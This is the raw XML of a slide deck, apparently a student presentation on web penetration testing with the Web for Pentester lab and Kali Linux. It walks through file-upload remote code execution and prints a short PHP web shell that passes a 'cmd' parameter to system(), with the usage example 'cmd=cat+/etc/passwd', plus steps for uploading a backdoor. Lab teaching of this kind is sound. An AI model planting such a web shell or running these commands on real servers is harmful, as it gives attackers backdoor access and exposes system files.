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62" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="279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36" r:id="rId29"/>
    <p:sldId id="265" r:id="rId30"/>
    <p:sldId id="278" r:id="rId31"/>
    <p:sldId id="266" r:id="rId32"/>
    <p:sldId id="280" r:id="rId33"/>
    <p:sldId id="267" r:id="rId34"/>
    <p:sldId id="281" r:id="rId35"/>
    <p:sldId id="268" r:id="rId36"/>
    <p:sldId id="286" r:id="rId37"/>
    <p:sldId id="270" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="295" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="277" r:id="rId43"/>
    <p:sldId id="301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0" r:id="rId64"/>
    <p:sldId id="322" r:id="rId65"/>
    <p:sldId id="323" r:id="rId66"/>
    <p:sldId id="324" r:id="rId67"/>
    <p:sldId id="325" r:id="rId68"/>
    <p:sldId id="271" r:id="rId69"/>
    <p:sldId id="276" r:id="rId70"/>
    <p:sldId id="272" r:id="rId71"/>
    <p:sldId id="275" r:id="rId72"/>
    <p:sldId id="297" r:id="rId73"/>
    <p:sldId id="273" r:id="rId74"/>
    <p:sldId id="274" r:id="rId75"/>
    <p:sldId id="291" r:id="rId76"/>
    <p:sldId id="258" r:id="rId7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43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DEA8D-6C52-455A-8CAC-A891B06E6BD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2E963-6AFF-4298-A24A-A0B6ACC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4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C3E5-6E4D-449A-8A7B-0130F7F4C433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96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75A2-1850-4C7B-87FB-CC69F671CF8C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7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1DEF-E50C-439F-87E7-E12876DF77F5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5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D9C-8C9C-4645-835F-8DB0D24B27B5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59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CEB8-19FC-4A5F-B228-889F09917406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468A-634E-4600-92E2-5AFB0DCA4862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7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CD2-4A52-4DD7-9E4E-D3B343031C56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A789-BF6E-43E1-86DD-1AF97E58AB43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FFB4-52D9-4FC6-8A22-00CA7F2E5F61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8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AD3-EC61-44D5-9B38-9F791BC66F4C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6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A44-5791-4CD4-87DE-2C5FE8CC08C1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1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0678-3ED1-4BB4-990C-BA6301C474F8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46FF-39CB-4E62-B691-6D34955EA85E}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:fld id="{9461EFB6-0680-40FF-ACD4-81B8283F1AC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7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37211" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/web-shells-penetration-tes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ugrathbone.com/blog/2012/07/09/donrsquot-accept-gifts-from-strangers-ndash-even-through-html-form-file-elem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30057" y="4864410"/>
            <a:ext cx="6858000" cy="1157852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 smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>報告人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>羅焌瑋</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>指導老師</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>偉大的恩師龍大大</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean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460" y="443172"/>
            <a:ext cx="8799204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2nd Semester of the 108th Academic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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itchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe 黑体 Std R" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Artificial Intelligence and Information Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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2199339"/>
            <a:ext cx="7772400" cy="187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Pentester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Lab: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 For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Pentester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37" y="1872456"/>
            <a:ext cx="4276725" cy="4257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2:Name and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Operating system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81275" y="3905250"/>
            <a:ext cx="4129087" cy="1209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37" y="1872456"/>
            <a:ext cx="4276725" cy="4257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3:Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>up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81275" y="3848100"/>
            <a:ext cx="4129087" cy="619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3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37" y="1872456"/>
            <a:ext cx="4276725" cy="4257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4:Create storage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07455" y="4152900"/>
            <a:ext cx="4129087" cy="1457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9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282" y="1825625"/>
            <a:ext cx="4205435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5:Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>type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07455" y="3448051"/>
            <a:ext cx="4129087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282" y="1825625"/>
            <a:ext cx="4205435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6:Dynamic or static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69282" y="4324351"/>
            <a:ext cx="4129087" cy="590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282" y="1825625"/>
            <a:ext cx="4205435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7:Location and size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69282" y="2724150"/>
            <a:ext cx="4129087" cy="208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90" y="1825625"/>
            <a:ext cx="6784420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8:Configuration settings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97682" y="5629275"/>
            <a:ext cx="3083793" cy="576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69533" y="2219325"/>
            <a:ext cx="597768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7891664">
            <a:off x="3100408" y="3860340"/>
            <a:ext cx="1905000" cy="60245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46" y="1825625"/>
            <a:ext cx="6002107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9:Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>image file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67001" y="2608261"/>
            <a:ext cx="2171700" cy="576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70946" y="2896393"/>
            <a:ext cx="1096054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6424633" y="3612690"/>
            <a:ext cx="1905000" cy="60245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90788" y="2608261"/>
            <a:ext cx="2614912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7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101056"/>
            <a:ext cx="6115050" cy="3800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9:Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>image file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70947" y="2845196"/>
            <a:ext cx="667428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694326">
            <a:off x="2182084" y="3397829"/>
            <a:ext cx="690329" cy="60245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38022" y="5334793"/>
            <a:ext cx="667428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2694326">
            <a:off x="3143429" y="4680606"/>
            <a:ext cx="1735021" cy="60245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46" y="1825625"/>
            <a:ext cx="6002107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9:Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>image file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50654" y="2675302"/>
            <a:ext cx="2092796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4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Agenda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89721"/>
            <a:ext cx="7886700" cy="5329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Introduction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Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>nvironment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Environment Building</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967654" y="1528175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XSS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SQL Injections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Commands Injection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File Include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TW" sz="3200" dirty="0"/>
              <a:t> File Upload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LDAP Attacks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XML attacks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Code Injection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 Directory Traversal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smtClean="0"/>
              <a:t>References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 descr="🤔 字符編碼: U+1F914 | Emoji表情符號辭典📓 | EmojiAll 🙃 繁體中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1143" y="3696848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401" y="1825625"/>
            <a:ext cx="6793198" cy="43513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8079" y="2246677"/>
            <a:ext cx="2092796" cy="258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2086769"/>
            <a:ext cx="5276850" cy="3829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26002" y="3075351"/>
            <a:ext cx="436798" cy="40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2086769"/>
            <a:ext cx="5276850" cy="3829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26002" y="3075351"/>
            <a:ext cx="436798" cy="40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3714911"/>
            <a:ext cx="4143375" cy="300656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7312766">
            <a:off x="5751528" y="3881615"/>
            <a:ext cx="904875" cy="666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2086769"/>
            <a:ext cx="5276850" cy="3829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26002" y="3075351"/>
            <a:ext cx="436798" cy="40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3714911"/>
            <a:ext cx="4143375" cy="300656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7312766">
            <a:off x="5751528" y="3881615"/>
            <a:ext cx="904875" cy="666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0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90" y="1825625"/>
            <a:ext cx="6784420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97682" y="5629275"/>
            <a:ext cx="3083793" cy="576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69533" y="2219325"/>
            <a:ext cx="597768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7891664">
            <a:off x="3100408" y="3860340"/>
            <a:ext cx="1905000" cy="60245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46" y="1825625"/>
            <a:ext cx="6002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46" y="1825625"/>
            <a:ext cx="6002107" cy="43513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45899" y="4819650"/>
            <a:ext cx="622715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Or you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>can use Bridged Adapter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56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90" y="1825625"/>
            <a:ext cx="6784420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10:Configure the network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900" y="4819650"/>
            <a:ext cx="68360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Don’t forget you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Linux need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>to set the same settings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73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90" y="1825625"/>
            <a:ext cx="6784420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11:Start virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>machine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08129" y="2237152"/>
            <a:ext cx="635471" cy="56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64729" y="5114925"/>
            <a:ext cx="3254846" cy="701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8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XSS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5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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Injections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Injection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4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Commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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7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Include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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Include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File Upload Vulnerabilities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4098" name="Picture 2" descr="Don't Accept Gifts From Strangers – Even Through HTML Form Fil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2" y="2052624"/>
            <a:ext cx="8512550" cy="37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951892" y="5798146"/>
            <a:ext cx="697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https://dougrathbone.com/blog/2012/07/09/donrsquot-accept-gifts-from-strangers-ndash-even-through-html-form-file-elements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4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10165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/>
              <a:t>Arbitrary File Upload Vulnerability &amp; Remote Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Execution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5349711"/>
            <a:ext cx="8190035" cy="488339"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.youtube.com/watch?v=kcnJMKXnW1k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50" y="180460"/>
            <a:ext cx="4833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  <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>PayPal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Bounty 2018 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj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1569" t="18269" r="27647" b="62495"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="430132" y="2858076"/>
            <a:ext cx="8587068" cy="1829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2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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23402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It's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>put together the basics of web testing and a summary of the most common vulnerabilities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78451"/>
            <a:ext cx="6180993" cy="3890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4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59178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/>
              <a:t>2020-04-24</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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8074775" cy="489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2746648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300075"/>
            <a:ext cx="424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https://www.ithome.com.tw/news/137211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 of PHP Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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23544" y="2071597"/>
            <a:ext cx="7662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shells are the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scripts </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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US" altLang="zh-TW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which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coded in many languages like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Python, ASP, Perl and so on </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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which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use as backdoor for illegitimate access in any server by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uploading it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 web server.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17127" b="30584"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501711" y="2849665"/>
            <a:ext cx="5786057" cy="31670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57468" y="921174"/>
            <a:ext cx="813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1:Find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websheell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Scripts on kali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1999" y="3831336"/>
            <a:ext cx="1746505" cy="1536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4976042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/share/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webshells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-al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2:Find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Scripts on kali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63" y="2221562"/>
            <a:ext cx="6002274" cy="44407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1999" y="3831336"/>
            <a:ext cx="1746505" cy="740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5668539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/share/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webshells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altLang="zh-TW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-al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37" y="2621089"/>
            <a:ext cx="6180671" cy="3633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:Upload the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0791" y="4652699"/>
            <a:ext cx="1810513" cy="740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482074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u"/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simple-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backdoor.php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 rot="10126869">
            <a:off x="3124727" y="5178479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52" y="2129228"/>
            <a:ext cx="6315863" cy="4243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4:Received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hyperlink </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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uploaded file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3752" y="4480559"/>
            <a:ext cx="987552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5:Access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backdoor.php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182"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="969263" y="2958428"/>
            <a:ext cx="7292719" cy="17087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70398" y="3437335"/>
            <a:ext cx="1881378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5:Access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backdoor.php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182"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039940" y="3993511"/>
            <a:ext cx="7292719" cy="17087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41075" y="4472418"/>
            <a:ext cx="1881378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2046412"/>
            <a:ext cx="6903720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observe that here “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3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=cat+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3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clear indication for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code execution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9940" y="5237466"/>
            <a:ext cx="7006780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39194" y="5283227"/>
            <a:ext cx="2261805" cy="3733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1917701"/>
            <a:ext cx="6972300" cy="4438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6:Execute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command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62590" y="3598417"/>
            <a:ext cx="6903720" cy="10772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cat+/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all the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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5342" y="2270393"/>
            <a:ext cx="1881378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6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50" y="3063625"/>
            <a:ext cx="8128700" cy="17966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6:Execute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command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69952" y="3598417"/>
            <a:ext cx="1881378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8774" y="1984568"/>
            <a:ext cx="1080026" cy="76944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4204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6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1" y="2893314"/>
            <a:ext cx="7795478" cy="23919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6:Execute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command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41936" y="3314953"/>
            <a:ext cx="1881378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8774" y="1984568"/>
            <a:ext cx="3201434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/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1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Code analysis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4320" y="1462704"/>
            <a:ext cx="88696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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>php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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>($_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>’])){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zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>若請求表頭有設置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>變數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>        echo “&lt;pre&gt;”;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文本標籤開始</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> = ($_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>’]);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zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值存入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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>變數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>        system($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>);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zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>        echo “&lt;/pre&gt;”;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>               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zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>標籤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>結束</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>        die;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>                   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zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>輸出訊息並結束</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/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?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Usage: http://target.com/simple-backdoor.php?cmd=cat+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4008160" y="1166880"/>
            <a:ext cx="2318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/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  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="向右箭號 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17356581">
            <a:off x="3383187" y="2252217"/>
            <a:ext cx="1399032" cy="319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6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37" y="2773988"/>
            <a:ext cx="6365469" cy="34256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1:Upload the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6903" y="4575477"/>
            <a:ext cx="1984249" cy="740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507722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u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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sd-php-backdoor.php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 rot="10126869">
            <a:off x="4160520" y="5179617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1275302" y="1635249"/>
            <a:ext cx="6593395" cy="49559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2:Access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qsd-php-backdoor.php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9957" y="1882855"/>
            <a:ext cx="1881378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1275302" y="1635249"/>
            <a:ext cx="6593395" cy="49559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3:View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phpinfo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5302" y="2651188"/>
            <a:ext cx="4212384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5487686" y="2651189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9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1275302" y="1635249"/>
            <a:ext cx="6593395" cy="49559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3:View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phpinfo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5302" y="2651188"/>
            <a:ext cx="4212384" cy="37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5487686" y="2651189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59" y="3074702"/>
            <a:ext cx="6343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1275302" y="1635249"/>
            <a:ext cx="6593395" cy="49559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4:Directory Traversal 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9854" y="3080957"/>
            <a:ext cx="3269266" cy="942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4747022" y="3359750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9529" y="4443574"/>
            <a:ext cx="7059168" cy="206210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TW" sz="3200" dirty="0"/>
              <a:t>Here you can perform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 traversal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>and you can also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the Web Server directory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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> by entering the command and clicking on the go button.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4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1275302" y="1635249"/>
            <a:ext cx="6593395" cy="49559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4:Directory Traversal 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9854" y="3080957"/>
            <a:ext cx="3269266" cy="338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16" y="3994961"/>
            <a:ext cx="7553325" cy="23907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93314" y="5660136"/>
            <a:ext cx="3269266" cy="722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4418028" y="5783087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8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1275302" y="1635249"/>
            <a:ext cx="6593395" cy="49559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4:Directory Traversal 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141" t="-34647" b="51521"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012916" y="2400040"/>
            <a:ext cx="5960505" cy="41330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12916" y="5120640"/>
            <a:ext cx="3269266" cy="1496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4418028" y="5783087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9854" y="3355848"/>
            <a:ext cx="3269266" cy="201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613219"/>
            <a:ext cx="5819775" cy="51082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5:Execute Shell Command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5634990" y="6291708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38775" y="4528959"/>
            <a:ext cx="2783134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8000" dirty="0" smtClean="0"/>
              <a:t>Id &amp; ls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30161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Test Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Kali Linux - 維基百科，自由的百科全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" y="2135074"/>
            <a:ext cx="2654517" cy="15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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
